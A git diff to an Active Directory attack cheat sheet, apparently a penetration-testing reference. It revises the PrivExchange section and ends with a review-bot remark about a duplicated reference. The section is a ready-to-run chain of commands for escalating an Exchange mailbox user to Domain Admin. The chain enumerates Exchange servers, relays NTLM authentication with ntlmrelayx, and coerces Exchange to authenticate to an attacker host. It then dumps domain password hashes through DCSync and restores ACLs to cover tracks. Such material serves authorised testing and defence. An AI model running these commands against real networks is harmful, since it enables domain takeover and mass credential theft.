Update PrivExchange based on chryzsh blog post
parent
a14b3af934
commit
859695e2be
|
@ -741,22 +741,46 @@ Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HAC
|
|||
|
||||
### PrivExchange attack
|
||||
|
||||
Exchange your privileges for Domain Admin privs by abusing Exchange.
|
||||
You need a shell on a user account with a mailbox.
|
||||
Exchange your privileges for Domain Admin privs by abusing Exchange.
|
||||
:warning: You need a shell on a user account with a mailbox.
|
||||
|
||||
|
||||
1. Exchange server hostname or IP address
|
||||
|
||||
```bash
|
||||
pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username
|
||||
```
|
||||
|
||||
|
||||
2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
|
||||
|
||||
```powershell
|
||||
ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username
|
||||
```
|
||||
|
||||
|
||||
3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine.
|
||||
|
||||
1. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server.
|
||||
```bash
|
||||
# https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
|
||||
python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx
|
||||
python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange
|
||||
|
||||
# https://github.com/G0ldenGunSec/PowerPriv
|
||||
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
|
||||
```
|
||||
|
||||
2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
|
||||
3. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
|
||||
4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
|
||||
|
||||
```bash
|
||||
python secretsdump.py xxxxxxxxxx -just-dc
|
||||
python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm
|
||||
```
|
||||
|
||||
5. Clean your mess and restore a previous state of the user's ACL
|
||||
|
||||
```powershell
|
||||
python aclpwn.py --restore ../aclpwn-20190319-125741.restore
|
||||
```
|
||||
|
||||
Alternatively you can use the Metasploit module
|
||||
|
@ -847,4 +871,5 @@ Most of the time the best passwords to spray are :
|
|||
* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)
|
||||
* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/)
|
||||
* [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence)
|
||||
* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
|
||||
* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
|
||||
* [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/)
|
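Review bot: the "Wagging the Dog" entry appears twice in this hunk as rendered, while the header `@ -847,4 +871,5` accounts for only one added line (the PrivExchange reference), so check that the file does not end up with a duplicated bullet. Style: the new entry puts the date before the author ("April 11, 2019 - @chryzsh"), whereas most neighbouring entries go title, author, date; "Exploiting PrivExchange - @chryzsh - April 11, 2019" would match them better.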